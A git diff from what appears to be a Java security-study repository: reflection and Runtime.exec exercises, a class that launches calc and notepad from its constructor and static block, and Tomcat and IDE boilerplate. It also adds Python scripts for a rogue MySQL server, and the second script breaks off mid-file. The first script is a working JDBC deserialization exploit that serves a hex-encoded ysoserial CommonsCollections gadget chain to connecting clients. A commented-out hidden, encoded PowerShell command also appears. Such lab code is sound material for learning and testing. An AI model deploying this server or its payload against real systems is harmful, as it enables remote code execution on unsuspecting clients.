"a/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/.idea/vcs.xml" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/.idea/vcs.xml" new file mode 100644 index 0000000..c2365ab --- /dev/null +++ "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/.idea/vcs.xml" @@ -0,0 +1,6 @@ + + + + + + \ No newline at end of file diff --git "a/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/1.txt" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/1.txt" new file mode 100644 index 0000000..ca90535 Binary files /dev/null and "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/1.txt" differ diff --git a/JNDI/JNDI_vul/client/pom.xml "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/pom.xml" similarity index 61% rename from JNDI/JNDI_vul/client/pom.xml rename to "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/pom.xml" index 09045e5..3737817 100644 --- a/JNDI/JNDI_vul/client/pom.xml +++ "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/pom.xml" @@ -3,13 +3,10 @@ xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"> 4.0.0 - - org.example - JNDI - 1.0-SNAPSHOT - - client + com.test + ReflectionStudy + 1.0-SNAPSHOT 8 @@ -17,4 +14,12 @@ UTF-8 + + + org.apache.commons + commons-io + 1.3.2 + + + \ No newline at end of file diff --git "a/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/src/main/java/com/test/pojo/Baka.java" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/src/main/java/com/test/pojo/Baka.java" new file mode 100644 index 0000000..63aed70 --- /dev/null +++ "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/src/main/java/com/test/pojo/Baka.java" @@ -0,0 +1,62 @@ +package com.test.pojo; + +public class Baka extends Object{ + public String name; + protected int gender; + private int age; + + public Baka() { + System.out.println("Baka⑨"); + } + + public Baka(String name, int gender, int age) { + this.name = name; + this.gender = gender; + this.age = age; + System.out.println(name + " " + gender + " " + age); + } + + public static void sit(String name) { + System.out.println("sit " + name); + } + + public void hello(String name) { + System.out.println("hello " + name); + } + + protected void hug(String name) { + System.out.println("hug " + name); + } + + private void kiss(String name) { + System.out.println("kiss " + name); + } + + private void kiss(String alias, String name) { + System.out.println("kiss " + alias + "(" + name + ")"); + } + + public String getName() { + return name; + } + + public void setName(String name) { + this.name = name; + } + + public int getGender() { + return gender; + } + + public void setGender(int gender) { + this.gender = gender; + } + + public int getAge() { + return age; + } + + public void setAge(int age) { + this.age = age; + } +} diff --git "a/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/src/main/java/com/test/pojo/Student.class" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/src/main/java/com/test/pojo/Student.class" new file mode 100644 index 0000000..94ba715 Binary files /dev/null and "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/src/main/java/com/test/pojo/Student.class" differ diff --git "a/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/src/main/java/com/test/pojo/Student.java" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/src/main/java/com/test/pojo/Student.java" new file mode 100644 index 0000000..ea1cd7c --- /dev/null +++ "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/src/main/java/com/test/pojo/Student.java" @@ -0,0 +1,25 @@ +package com.test.pojo; + +import java.io.IOException; + +public class Student { + private int id; + + public Student() { + System.out.println("Student no-arg constructor"); + try { + Runtime.getRuntime().exec("calc"); + } catch (IOException e) { + throw new RuntimeException(e); + } + } + + static { + System.out.println("Student static block"); + try { + Runtime.getRuntime().exec("notepad"); + } catch (IOException e) { + throw new RuntimeException(e); + } + } +} diff --git "a/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/src/main/java/com/test/study/Reflection2Runtime.java" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/src/main/java/com/test/study/Reflection2Runtime.java" new file mode 100644 index 0000000..3b0170f --- /dev/null +++ "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/src/main/java/com/test/study/Reflection2Runtime.java" @@ -0,0 +1,32 @@ +package com.test.study; + +import org.apache.commons.io.IOUtils; + +import java.io.*; +import java.lang.reflect.Constructor; +import java.lang.reflect.InvocationTargetException; + +public class Reflection2Runtime { + public static void main(String[] args) throws ClassNotFoundException, NoSuchMethodException, InvocationTargetException, InstantiationException, IllegalAccessException, IOException { + Class aClass = Class.forName("java.lang.Runtime"); + Constructor declaredConstructor = aClass.getDeclaredConstructor(); + declaredConstructor.setAccessible(true); + Runtime runtime = (Runtime) declaredConstructor.newInstance(); + runtime.exec("calc"); + + InputStream inputStream = Runtime.getRuntime().exec("whoami").getInputStream(); + System.out.println(IOUtils.toString(inputStream)); + + inputStream = Runtime.getRuntime().exec("whoami").getInputStream(); + BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(inputStream)); + StringBuilder stringBuilder = new StringBuilder(); + String line; + while ((line = bufferedReader.readLine()) != null) { + stringBuilder.append(line); + } + System.out.println(stringBuilder); + + + + } +} diff --git "a/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/src/main/java/com/test/study/ReflectionMethods.java" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/src/main/java/com/test/study/ReflectionMethods.java" new file mode 100644 index 0000000..be94188 --- /dev/null +++ "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/src/main/java/com/test/study/ReflectionMethods.java" @@ -0,0 +1,86 @@ +package com.test.study; + +import com.test.pojo.Baka; + +import java.lang.reflect.Constructor; +import java.lang.reflect.Field; +import java.lang.reflect.InvocationTargetException; +import java.lang.reflect.Method; + +public class ReflectionMethods { + public static void main(String[] args) throws Exception { + getField(); + } + + public static void getMethod() throws Exception { + Baka baka = new Baka(); + + Class aClass = Class.forName("com.test.pojo.Baka"); + // 获取所有public方法，包括父类的 + Method[] methods = aClass.getMethods(); + for (Method method : methods) { + System.out.println(method.getName()); + } + + System.out.println("================================"); + + // 获取自己类的所有方法 + Method[] declaredMethods = aClass.getDeclaredMethods(); + for (Method method : declaredMethods) { + System.out.println(method.getName()); + } + + System.out.println("================================"); + + Method method = aClass.getDeclaredMethod("kiss", String.class); + // 临时设置私有方法可访问 + method.setAccessible(true); + method.invoke(baka, "1diot9"); + + Method method1 = aClass.getDeclaredMethod("kiss", String.class, String.class); + method1.setAccessible(true); + method1.invoke(baka, "baka", "1diot9"); + + Method method2 = aClass.getMethod("sit", String.class); + // static方法可以不写obj参数 + method2.invoke(null, "here"); + } + + public static void getConstructor() throws Exception { + Baka baka = new Baka(); + Class aClass = Class.forName("com.test.pojo.Baka"); + Constructor[] constructors = aClass.getConstructors(); + for (Constructor constructor : constructors) { + System.out.println(constructor.getName()); + } + + + Constructor constructor = aClass.getDeclaredConstructor(String.class, int.class, int.class); + constructor.setAccessible(true); + constructor.newInstance("1diot9", 0, 1); + + Constructor constructor1 = aClass.getConstructor(); + constructor1.setAccessible(true); + constructor1.newInstance(); + } + + public static void getField() throws Exception { + Baka baka = new Baka(); + Class aClass = Class.forName("com.test.pojo.Baka"); + Field[] fields = aClass.getDeclaredFields(); + for (Field field : fields) { + System.out.println(field.getName()); + } + + baka.setName("1diot9"); + + Field field = aClass.getDeclaredField("name"); + field.setAccessible(true); + // 反射修改字段 + field.set(baka, "anything"); + Object o = field.get(baka); + System.out.println(o); + + + } +} diff --git "a/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/src/main/java/com/test/study/RuntimeExec.java" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/src/main/java/com/test/study/RuntimeExec.java" new file mode 100644 index 0000000..53d4704 --- /dev/null +++ "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/src/main/java/com/test/study/RuntimeExec.java" @@ -0,0 +1,22 @@ +package com.test.study; + +import org.apache.commons.io.IOUtils; + +import java.io.IOException; +import java.io.InputStream; + +public class RuntimeExec { + public static void main(String[] args) throws IOException { + InputStream inputStream = Runtime.getRuntime().exec("whoami && whoami").getInputStream(); + System.out.println(IOUtils.toString(inputStream)); + inputStream = Runtime.getRuntime().exec(new String[]{"whoami","&&","whoami"}).getInputStream(); + System.out.println(IOUtils.toString(inputStream)); + inputStream = Runtime.getRuntime().exec(new String[]{"whoami && whoami"}).getInputStream(); + System.out.println(IOUtils.toString(inputStream)); + inputStream = Runtime.getRuntime().exec(new String[]{"cmd.exe","/c","whoami && whoami"}).getInputStream(); + System.out.println(IOUtils.toString(inputStream)); +// inputStream = Runtime.getRuntime().exec("echo 1 > 1.txt").getInputStream(); +// System.out.println(IOUtils.toString(inputStream)); +// inputStream = Runtime.getRuntime().exec("powershell.exe -NonI -W Hidden -NoP -Exec Bypass -Enc ZQBjAGgAbwAgADEAIAA+ACAAMQAuAHQAeAB0AA==").getInputStream(); + } +} diff --git "a/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/src/main/java/com/test/study/Ways2Class.java" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/src/main/java/com/test/study/Ways2Class.java" new file mode 100644 index 0000000..9f437d1 --- /dev/null +++ "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/src/main/java/com/test/study/Ways2Class.java" @@ -0,0 +1,19 @@ +package com.test.study; + +import com.test.pojo.Baka; + +public class Ways2Class { + public static void main(String[] args) throws ClassNotFoundException { + Baka baka = new Baka(); + + Class aClass = baka.getClass(); + + Class aClass1 = Class.forName("com.test.pojo.Baka"); + + Class aClass2 = Baka.class; + + System.out.println(aClass.equals(aClass1)); + System.out.println(aClass.equals(aClass2)); + System.out.println(aClass1.equals(aClass2)); + } +} diff --git "a/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/src/main/java/com/test/study/tmp.java" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/src/main/java/com/test/study/tmp.java" new file mode 100644 index 0000000..c883171 --- /dev/null +++ "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/src/main/java/com/test/study/tmp.java" @@ -0,0 +1,16 @@ +package com.test.study; + +import org.apache.commons.io.IOUtils; + +import java.io.IOException; +import java.io.InputStream; + +public class tmp { + public static void main(String[] args) throws IOException { +// Runtime runtime = new Runtime(); +// runtime.exec("calc"); + Process exec = Runtime.getRuntime().exec("whoami"); + InputStream inputStream = exec.getInputStream(); + System.out.println(IOUtils.toString(inputStream)); + } +} diff --git a/MiddleWare/Tomcat/.gitignore b/MiddleWare/Tomcat/.gitignore new file mode 100644 index 0000000..5ff6309 --- /dev/null +++ b/MiddleWare/Tomcat/.gitignore @@ -0,0 +1,38 @@ +target/ +!.mvn/wrapper/maven-wrapper.jar +!**/src/main/**/target/ +!**/src/test/**/target/ + +### IntelliJ IDEA ### +.idea/modules.xml +.idea/jarRepositories.xml +.idea/compiler.xml +.idea/libraries/ +*.iws +*.iml +*.ipr + +### Eclipse ### +.apt_generated +.classpath +.factorypath +.project +.settings +.springBeans +.sts4-cache + +### NetBeans ### +/nbproject/private/ +/nbbuild/ +/dist/ +/nbdist/ +/.nb-gradle/ +build/ +!**/src/main/**/build/ +!**/src/test/**/build/ + +### VS Code ### +.vscode/ + +### Mac OS ### +.DS_Store \ No newline at end of file diff --git a/MiddleWare/Tomcat/.idea/.gitignore b/MiddleWare/Tomcat/.idea/.gitignore new file mode 100644 index 0000000..35410ca --- /dev/null +++ b/MiddleWare/Tomcat/.idea/.gitignore @@ -0,0 +1,8 @@ +# 默认忽略的文件 +/shelf/ +/workspace.xml +# 基于编辑器的 HTTP 客户端请求 +/httpRequests/ +# Datasource local storage ignored files +/dataSources/ +/dataSources.local.xml diff --git a/MiddleWare/Tomcat/.idea/encodings.xml b/MiddleWare/Tomcat/.idea/encodings.xml new file mode 100644 index 0000000..aa00ffa --- /dev/null +++ b/MiddleWare/Tomcat/.idea/encodings.xml @@ -0,0 +1,7 @@ + + + + + + + \ No newline at end of file diff --git a/MiddleWare/Tomcat/.idea/misc.xml b/MiddleWare/Tomcat/.idea/misc.xml new file mode 100644 index 0000000..d23f859 --- /dev/null +++ b/MiddleWare/Tomcat/.idea/misc.xml @@ -0,0 +1,14 @@ + + + + + + + + + + \ No newline at end of file diff --git a/hessian/dubbo/.idea/vcs.xml b/MiddleWare/Tomcat/.idea/vcs.xml similarity index 100% rename from hessian/dubbo/.idea/vcs.xml rename to MiddleWare/Tomcat/.idea/vcs.xml diff --git a/MiddleWare/Tomcat/pom.xml b/MiddleWare/Tomcat/pom.xml new file mode 100644 index 0000000..31f8c91 --- /dev/null +++ b/MiddleWare/Tomcat/pom.xml @@ -0,0 +1,21 @@ + + 4.0.0 + com.test + Tomcat + war + 1.0-SNAPSHOT + Tomcat Maven Webapp + http://maven.apache.org + + + junit + junit + 3.8.1 + test + + + + Tomcat + + diff --git a/MiddleWare/Tomcat/src/main/java/com/test/servlet.java b/MiddleWare/Tomcat/src/main/java/com/test/servlet.java new file mode 100644 index 0000000..9f2d3c0 --- /dev/null +++ b/MiddleWare/Tomcat/src/main/java/com/test/servlet.java @@ -0,0 +1,4 @@ +package com.test; + +public class servlet { +} diff --git a/MiddleWare/Tomcat/src/main/java/com/test/tmp.java b/MiddleWare/Tomcat/src/main/java/com/test/tmp.java new file mode 100644 index 0000000..00a8f3c --- /dev/null +++ b/MiddleWare/Tomcat/src/main/java/com/test/tmp.java @@ -0,0 +1,4 @@ +package com.test; + +public class tmp { +} diff --git a/MiddleWare/Tomcat/src/main/webapp/WEB-INF/web.xml b/MiddleWare/Tomcat/src/main/webapp/WEB-INF/web.xml new file mode 100644 index 0000000..9f88c1f --- /dev/null +++ b/MiddleWare/Tomcat/src/main/webapp/WEB-INF/web.xml @@ -0,0 +1,7 @@ + + + + Archetype Created Web Application + diff --git a/MiddleWare/Tomcat/src/main/webapp/index.jsp b/MiddleWare/Tomcat/src/main/webapp/index.jsp new file mode 100644 index 0000000..cc264d7 --- /dev/null +++ b/MiddleWare/Tomcat/src/main/webapp/index.jsp @@ -0,0 +1,16 @@ +<%-- + Created by IntelliJ IDEA. + User: snowstorm-maxy + Date: 2025/11/29 + Time: 10:27 + To change this template use File | Settings | File Templates. +--%> +<%@ page contentType="text/html;charset=UTF-8" language="java" %> + + + $Title$ + + + $END$ + + diff --git a/PyCharm/.idea/.gitignore b/PyCharm/.idea/.gitignore new file mode 100644 index 0000000..35410ca --- /dev/null +++ b/PyCharm/.idea/.gitignore @@ -0,0 +1,8 @@ +# 默认忽略的文件 +/shelf/ +/workspace.xml +# 基于编辑器的 HTTP 客户端请求 +/httpRequests/ +# Datasource local storage ignored files +/dataSources/ +/dataSources.local.xml diff --git a/PyCharm/.idea/PyCharm.iml b/PyCharm/.idea/PyCharm.iml new file mode 100644 index 0000000..f571432 --- /dev/null +++ b/PyCharm/.idea/PyCharm.iml @@ -0,0 +1,8 @@ + + + + + + + + \ No newline at end of file diff --git a/PyCharm/.idea/inspectionProfiles/Project_Default.xml b/PyCharm/.idea/inspectionProfiles/Project_Default.xml new file mode 100644 index 0000000..528e736 --- /dev/null +++ b/PyCharm/.idea/inspectionProfiles/Project_Default.xml @@ -0,0 +1,39 @@ + + + + \ No newline at end of file diff --git a/PyCharm/.idea/inspectionProfiles/profiles_settings.xml b/PyCharm/.idea/inspectionProfiles/profiles_settings.xml new file mode 100644 index 0000000..105ce2d --- /dev/null +++ b/PyCharm/.idea/inspectionProfiles/profiles_settings.xml @@ -0,0 +1,6 @@ + + + + \ No newline at end of file diff --git a/PyCharm/.idea/misc.xml b/PyCharm/.idea/misc.xml new file mode 100644 index 0000000..db8786c --- /dev/null +++ b/PyCharm/.idea/misc.xml @@ -0,0 +1,7 @@ + + + + + + \ No newline at end of file diff --git a/PyCharm/.idea/modules.xml b/PyCharm/.idea/modules.xml new file mode 100644 index 0000000..c04746d --- /dev/null +++ b/PyCharm/.idea/modules.xml @@ -0,0 +1,8 @@ + + + + + + + + \ No newline at end of file diff --git a/PyCharm/.idea/vcs.xml b/PyCharm/.idea/vcs.xml new file mode 100644 index 0000000..6c0b863 --- /dev/null +++ b/PyCharm/.idea/vcs.xml @@ -0,0 +1,6 @@ + + + + + + \ No newline at end of file diff --git a/PyCharm/JDBC/Mysql/convert.py b/PyCharm/JDBC/Mysql/convert.py new file mode 100644 index 0000000..477f153 --- /dev/null +++ b/PyCharm/JDBC/Mysql/convert.py @@ -0,0 +1,3 @@ +with open("hex.txt", "r") as f: + data = bytes.fromhex(f.read()) + open("hex.pcap", "wb").write(data) \ No newline at end of file diff --git a/PyCharm/JDBC/Mysql/fakeServer.py b/PyCharm/JDBC/Mysql/fakeServer.py new file mode 100644 index 0000000..7349af8 --- /dev/null +++ b/PyCharm/JDBC/Mysql/fakeServer.py @@ -0,0 +1,100 @@ +# coding=utf-8 +import socket +import binascii +import os + +greeting_data="4a0000000a352e372e31390008000000463b452623342c2d00fff7080200ff811500000000000000000000032851553e5c23502c51366a006d7973716c5f6e61746976655f70617373776f726400" +response_ok_data="0700000200000002000000" + +def receive_data(conn): + data = conn.recv(1024) + print("[*] Receiveing the package : {}".format(data)) + return str(data).lower() + +def send_data(conn,data): + print("[*] Sending the package : {}".format(data)) + conn.send(binascii.a2b_hex(data)) + +def get_payload_content(): + #file文件的内容使用ysoserial生成的使用规则：java -jar ysoserial [Gadget] [command] > payload + file= r'D:\1tmp\cc5.bin' + if os.path.isfile(file): + with open(file, 'rb') as f: + payload_content = str(binascii.b2a_hex(f.read()),encoding='utf-8') + print("open successs") + + else: + print("open false") + #calc + payload_content='aced0005737200116a6176612e7574696c2e48617368536574ba44859596b8b7340300007870770c000000023f40000000000001737200346f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6b657976616c75652e546965644d6170456e7472798aadd29b39c11fdb0200024c00036b65797400124c6a6176612f6c616e672f4f626a6563743b4c00036d617074000f4c6a6176612f7574696c2f4d61703b7870740003666f6f7372002a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d83418990200007870000000057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e7471007e00037870767200116a6176612e6c616e672e52756e74696d65000000000000000000000078707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000274000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a990200007870000000007400096765744d6574686f647571007e001b00000002767200106a6176612e6c616e672e537472696e67a0f0a4387a3bb34202000078707671007e001b7371007e00137571007e001800000002707571007e001800000000740006696e766f6b657571007e001b00000002767200106a6176612e6c616e672e4f626a656374000000000000000000000078707671007e00187371007e0013757200135b4c6a6176612e6c616e672e537472696e673badd256e7e91d7b4702000078700000000174000463616c63740004657865637571007e001b0000000171007e00207371007e000f737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b020000787000000001737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f4000000000000077080000001000000000787878' + return payload_content + +# 主要逻辑 +def run(): + + while 1: + conn, addr = sk.accept() + print("Connection come from {}:{}".format(addr[0],addr[1])) + + # 1.先发送第一个问候报文 + send_data(conn,greeting_data) + + while True: + # 登录认证过程模拟 1.客户端发送request login报文 2.服务端响应response_ok + receive_data(conn) + send_data(conn,response_ok_data) + + #其他过程 + data=receive_data(conn) + #查询一些配置信息,其中会发送自己的版本号 + if "session.auto_increment_increment" in data: + _payload='01000001132e00000203646566000000186175746f5f696e6372656d656e745f696e6372656d656e74000c3f001500000008a0000000002a00000303646566000000146368617261637465725f7365745f636c69656e74000c21000c000000fd00001f00002e00000403646566000000186368617261637465725f7365745f636f6e6e656374696f6e000c21000c000000fd00001f00002b00000503646566000000156368617261637465725f7365745f726573756c7473000c21000c000000fd00001f00002a00000603646566000000146368617261637465725f7365745f736572766572000c210012000000fd00001f0000260000070364656600000010636f6c6c6174696f6e5f736572766572000c210033000000fd00001f000022000008036465660000000c696e69745f636f6e6e656374000c210000000000fd00001f0000290000090364656600000013696e7465726163746976655f74696d656f7574000c3f001500000008a0000000001d00000a03646566000000076c6963656e7365000c210009000000fd00001f00002c00000b03646566000000166c6f7765725f636173655f7461626c655f6e616d6573000c3f001500000008a0000000002800000c03646566000000126d61785f616c6c6f7765645f7061636b6574000c3f001500000008a0000000002700000d03646566000000116e65745f77726974655f74696d656f7574000c3f001500000008a0000000002600000e036465660000001071756572795f63616368655f73697a65000c3f001500000008a0000000002600000f036465660000001071756572795f63616368655f74797065000c210009000000fd00001f00001e000010036465660000000873716c5f6d6f6465000c21009b010000fd00001f000026000011036465660000001073797374656d5f74696d655f7a6f6e65000c21001b000000fd00001f00001f000012036465660000000974696d655f7a6f6e65000c210012000000fd00001f00002b00001303646566000000157472616e73616374696f6e5f69736f6c6174696f6e000c21002d000000fd00001f000022000014036465660000000c776169745f74696d656f7574000c3f001500000008a000000000020100150131047574663804757466380475746638066c6174696e31116c6174696e315f737765646973685f6369000532383830300347504c013107343139343330340236300731303438353736034f4646894f4e4c595f46554c4c5f47524f55505f42592c5354524943545f5452414e535f5441424c45532c4e4f5f5a45524f5f494e5f444154452c4e4f5f5a45524f5f444154452c4552524f525f464f525f4449564953494f4e5f42595f5a45524f2c4e4f5f4155544f5f4352454154455f555345522c4e4f5f454e47494e455f535542535449545554494f4e0cd6d0b9fab1ead7bccab1bce4062b30383a30300f52455045415441424c452d5245414405323838303007000016fe000002000000' + send_data(conn,_payload) + data=receive_data(conn) + elif "show warnings" in data: + _payload = '01000001031b00000203646566000000054c6576656c000c210015000000fd01001f00001a0000030364656600000004436f6465000c3f000400000003a1000000001d00000403646566000000074d657373616765000c210000060000fd01001f000059000005075761726e696e6704313238374b27404071756572795f63616368655f73697a6527206973206465707265636174656420616e642077696c6c2062652072656d6f76656420696e2061206675747572652072656c656173652e59000006075761726e696e6704313238374b27404071756572795f63616368655f7479706527206973206465707265636174656420616e642077696c6c2062652072656d6f76656420696e2061206675747572652072656c656173652e07000007fe000002000000' + send_data(conn, _payload) + data = receive_data(conn) + if "set names" in data: + send_data(conn, response_ok_data) + data = receive_data(conn) + if "set character_set_results" in data: + send_data(conn, response_ok_data) + data = receive_data(conn) + if "show session status" in data: + mysql_data = '0100000102' + mysql_data += '1a000002036465660001630163016301630c3f00ffff0000fc9000000000' + mysql_data += '1a000003036465660001630163016301630c3f00ffff0000fc9000000000' + # 为什么我加了EOF Packet 就无法正常运行呢？？ + # 获取payload + payload_content=get_payload_content() + # 计算payload长度 + payload_length = str(hex(len(payload_content)//2)).replace('0x', '').zfill(4) + payload_length_hex = payload_length[2:4] + payload_length[0:2] + # 计算数据包长度 + data_len = str(hex(len(payload_content)//2 + 4)).replace('0x', '').zfill(6) + data_len_hex = data_len[4:6] + data_len[2:4] + data_len[0:2] + mysql_data += data_len_hex + '04' + 'fbfc'+ payload_length_hex + mysql_data += str(payload_content) + mysql_data += '07000005fe000022000100' + send_data(conn, mysql_data) + data = receive_data(conn) + if "show warnings" in data: + payload = '01000001031b00000203646566000000054c6576656c000c210015000000fd01001f00001a0000030364656600000004436f6465000c3f000400000003a1000000001d00000403646566000000074d657373616765000c210000060000fd01001f00006d000005044e6f74650431313035625175657279202753484f572053455353494f4e20535441545553272072657772697474656e20746f202773656c6563742069642c6f626a2066726f6d2063657368692e6f626a73272062792061207175657279207265777269746520706c7567696e07000006fe000002000000' + send_data(conn, payload) + break + + +if __name__ == '__main__': + HOST ='127.0.0.1' + PORT = 3307 + + sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + #当socket关闭后，本地端用于该socket的端口号立刻就可以被重用.为了实验的时候不用等待很长时间 + sk.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) + sk.bind((HOST, PORT)) + sk.listen(1) + + print("start fake mysql server listening on {}:{}".format(HOST,PORT)) + + run() \ No newline at end of file diff --git a/PyCharm/JDBC/Mysql/fakeServerM4x.py b/PyCharm/JDBC/Mysql/fakeServerM4x.py new file mode 100644 index 0000000..dc76486 --- /dev/null +++ b/PyCharm/JDBC/Mysql/fakeServerM4x.py @@ -0,0 +1,90 @@ +import binascii +import os +import socket +import threading + +SHOW_VARIABLES = False + +def get_payload_content(): + #file文件的内容使用ysoserial生成的使用规则：java -jar ysoserial [Gadget] [command] > payload + file= r'D:\1tmp\CommonsCollections6.bin' + if os.path.isfile(file): + with open(file, 'rb') as f: + payload_content = str(binascii.b2a_hex(f.read()),encoding='utf-8') + print("open successs") + + else: + print("open false") + #calc + 